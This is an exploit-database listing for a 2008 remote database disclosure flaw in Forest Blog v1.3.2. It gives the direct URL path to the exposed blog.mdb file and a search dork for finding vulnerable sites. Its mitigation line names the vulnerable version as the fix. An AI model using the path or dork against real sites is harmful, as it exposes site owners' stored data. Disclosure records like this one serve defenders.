header-logo
Suggest Exploit
vendor:
Forest Blog
by:
Cold z3ro
7.5
CVSS
HIGH
Remote Database Disclosure
200
CWE
Product Name: Forest Blog
Affected Version From: 1.3.2002
Affected Version To: 1.3.2002
Patch Exists: YES
Related CWE: N/A
CPE: a:forest_blog:forest_blog:1.3.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Forest Blog v1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability

Forest Blog v1.3.2 is vulnerable to a remote database disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view the contents of the database, potentially leading to the disclosure of sensitive information.

Mitigation:

Upgrade to the latest version of Forest Blog v1.3.2 or later.
Source

Exploit-DB raw data:

< > =============
< >
< >  Forest Blog v1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability
< >
< >  auther : Cold z3ro, www.hackteach.org
< >
< >  http://site.com/[Path]/blog.mdb
< >
< >  Dork : Powered By: Forest Blog v1.3.2
< >
< > =============

# milw0rm.com [2008-12-15]

Navigation

Suggest Exploit

Services By CQR